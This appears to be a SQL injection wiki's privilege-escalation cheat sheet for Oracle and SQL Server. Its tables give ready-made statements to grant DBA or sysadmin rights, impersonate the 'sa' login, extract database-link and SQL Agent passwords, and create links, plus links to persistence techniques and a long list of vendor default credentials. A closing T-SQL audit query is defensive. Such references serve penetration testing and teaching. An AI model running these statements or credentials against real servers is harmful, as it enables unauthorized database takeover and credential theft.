Privilege Escalation
Some features require a privileged user, and when escalating a vulnerability, obtaining a privileged user is always the first step.
MySQL
No entries yet. If you know a useful technique, please contribute on our Github!
Oracle
* Requires a privileged user.
| Description | Statement |
|---|---|
| Dump all DBA usernames | `SELECT username FROM user_role_privs WHERE granted_role='DBA';` |
| Create a DBA user | * `GRANT DBA TO USER;` |
| Create a procedure | `CREATE OR REPLACE PROCEDURE "SYSTEM".netspi1 (id IN VARCHAR2) AS PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'grant dba to scott'; COMMIT; END;`<br>`BEGIN SYSTEM.netspi1('netspi'); END;` |
| Find database links | `SELECT * FROM DBA_DB_LINKS;`<br>`SELECT * FROM ALL_DB_LINKS;`<br>`SELECT * FROM USER_DB_LINKS;` |
| Query database links | `SELECT * FROM sales@miami; -- minimum for preconfigured`<br>`SELECT * FROM SQLInjection@secfree.com; -- standard usage for selecting a table from a schema on the remote server`<br>`SELECT * FROM SQLInjection@secfree.com@hq_1; -- standard usage for selecting a table from a schema on a remote server instance`<br>`SELECT db_link,password FROM user_db_links WHERE db_link LIKE 'TEST%';`<br>`SELECT name,password FROM sys.link$ WHERE name LIKE 'TEST%';`<br>`SELECT name,passwordx FROM sys.link$ WHERE name LIKE 'TEST%';` |
| Execute a stored procedure over a database link | `EXEC mySchema.myPackage.myProcedure@myRemoteDB('someParameter');`<br>`SELECT dbms_xmlquery.getxml('select * from emp') FROM SQLInjection@secfree.com;` |
| Create a database link | `CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com; -- connected user setup`<br>`CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com CONNECT TO harold IDENTIFIED BY tiger; -- standard defined user/pass`<br>`CREATE SHARED PUBLIC DATABASE LINK hq.netspi.com.com@hq_1 USING 'string_to_hq_1'; -- instance specific`<br>`CREATE SHARED PUBLIC DATABASE LINK link_2 CONNECT TO jane IDENTIFIED BY doe USING 'us_supply'; -- defined user/pass` |
| Drop a link | `DROP DATABASE LINK miami;` |
SQL Server
* Requires a privileged user. The queries below need various kinds of permissions; detailed privilege escalation paths are to follow.
| Description | Statement |
|---|---|
| Create a DBA user | * `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';` |
| Grant execute on all custom objects | `SELECT 'grant exec on ' + QUOTENAME(ROUTINE_SCHEMA) + '.' + QUOTENAME(ROUTINE_NAME) + ' TO test' FROM INFORMATION_SCHEMA.ROUTINES WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'IsMSShipped') = 0;` |
| Grant execute on all stored procedures | `CREATE ROLE db_executor;`<br>`GRANT EXECUTE TO db_executor;`<br>`EXEC sp_addrolemember 'db_executor', 'YourSecurityAccount';` |
| UNC path injection | https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e<br>https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ |
| Detect impersonable logins | `SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';` |
| Impersonate a login. Note: `REVERT` returns you to the original login. | `EXECUTE AS LOGIN = 'sa'; SELECT @@VERSION;` |
| Create a sysadmin user | * `USE [master]`<br>`GO`<br>`CREATE LOGIN [test] WITH PASSWORD=N'test', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF`<br>`GO`<br>`EXEC master..sp_addsrvrolemember @loginame=N'test', @rolename=N'sysadmin'`<br>`GO` |
| Create a sysadmin user | * `EXEC sp_addlogin 'user', 'pass';`<br>* `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';` |
| Drop a user | * `EXEC sp_droplogin 'user';` |
| Retrieve the SQL Agent connection password | `EXEC msdb.dbo.sp_get_sqlagent_properties;` |
| Retrieve DTS connection passwords | `select msdb.dbo.rtbldmbprops` |
| Get sysadmin as local administrator | https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/ |
| Startup stored procedures | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ |
| Trigger creation | https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ |
| Windows auto-login passwords | https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/ |
| xp_regwrite execution as non-sysadmin | https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Stored procedures with trustworthy databases | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases |
| Stored procedure user impersonation | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/ |
| Default passwords | `sa:sa`<br>`sa:[empty]`<br>`[username]:[username]` |

Default passwords by instance (instance name, user, password):

| Instance | User | Password |
|---|---|---|
| ACS | ej | `ej` |
| ACT7 | sa | `sage` |
| AOM2 | admin | `ca_admin` |
| ARIS | ARIS9 | `*ARIS!1dm9n#` |
| AutodeskVault | sa | `AutodeskVault@26200` |
| BOSCHSQL | sa | `RPSsql12345` |
| BPASERVER9 | sa | `AutoMateBPA9` |
| CDRDICOM | sa | `CDRDicom50!` |
| CODEPAL | sa | `Cod3p@l` |
| CODEPAL08 | sa | `Cod3p@l` |
| CounterPoint | sa | `CounterPoint8` |
| CSSQL05 | ELNAdmin | `ELNAdmin` |
| CSSQL05 | sa | `CambridgeSoft_SA` |
| CADSQL | CADSQLAdminUser | `Cr41g1sth3M4n!` |
| DHLEASYSHIP | sa | `DHLadmin@1` |
| DPM | admin | `ca_admin` |
| DVTEL | sa | [empty] |
| EASYSHIP | sa | `DHLadmin@1` |
| ECC | sa | `Webgility2011` |
| ECOPYDB | e+C0py2007_@x | `e+C0py2007_@x` |
| ECOPYDB | sa | `ecopy` |
| Emerson2012 | sa | `42Emerson42Eme` |
| HDPS | sa | `sa` |
| HPDSS | sa | `Hpdsdb000001` |
| HPDSS | sa | `hpdss` |
| INSERTGT | msi | `keyboa5` |
| INSERTGT | sa | [empty] |
| INTRAVET | sa | `Webster#1` |
| MYMOVIES | sa | `t9AranuHA7` |
| PCAMERICA | sa | `pcAmer1ca` |
| PCAMERICA | sa | `PCAmerica` |
| PRISM | sa | `SecurityMaster08` |
| RMSQLDATA | Super | `Orange` |
| RTCLOCAL | sa | `mypassword` |
| SALESLOGIX | sa | `SLXMaster` |
| SIDEXIS_SQL | sa | `2BeChanged` |
| SQL2K5 | ovsd | `ovsd` |
| SQLEXPRESS | admin | `ca_admin` |
| STANDARDDEV2014 | test | `test` |
| TEW_SQLEXPRESS | tew | `tew` |
| vocollect | vocollect | `vocollect` |
| VSDOTNET | sa | [empty] |
| VSQL | sa | `111` |
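The SQL Server rows above rest on three server-level conditions: membership in the sysadmin role, IMPERSONATE grants between logins, and TRUSTWORTHY databases owned by a sysadmin. The following T-SQL audit query is an added example written for this page, not part of the original cheat sheet or of any NetSPI tool; it reports all three in one result set so a DBA can review them. It uses only documented catalog views (`sys.server_role_members`, `sys.server_principals`, `sys.server_permissions`, `sys.databases`); the `finding` labels are my own.

```sql
-- Audit of the three privilege paths used in the SQL Server table.
-- Added example; run as a login that can read the server catalog views.

-- 1. Members of the sysadmin fixed server role.
SELECT 'sysadmin member' AS finding,
       m.name           AS detail,
       m.type_desc      AS principal_type
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin'

UNION ALL

-- 2. Server-level IMPERSONATE grants: who may run EXECUTE AS LOGIN on whom.
--    For permissions on a login, major_id is the principal_id of the target login.
SELECT 'IMPERSONATE grant',
       grantee.name + ' -> ' + target.name,
       grantee.type_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id             = target.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc      = 'SERVER_PRINCIPAL'
  AND p.state IN ('G', 'W')        -- GRANT or GRANT WITH GRANT OPTION

UNION ALL

-- 3. TRUSTWORTHY databases whose owner is a sysadmin.
--    msdb is TRUSTWORTHY by design and is excluded from the findings.
SELECT 'TRUSTWORTHY db owned by sysadmin',
       d.name,
       SUSER_SNAME(d.owner_sid)
FROM sys.databases d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb'
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1
ORDER BY finding, detail;
```

An empty result set, apart from the expected sysadmin members, is the baseline to aim for; each other row corresponds directly to one of the escalation paths listed in the table (impersonation via `EXECUTE AS LOGIN`, or a trustworthy database whose owner's privileges a stored procedure can inherit).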
Article last updated on 2021-09-22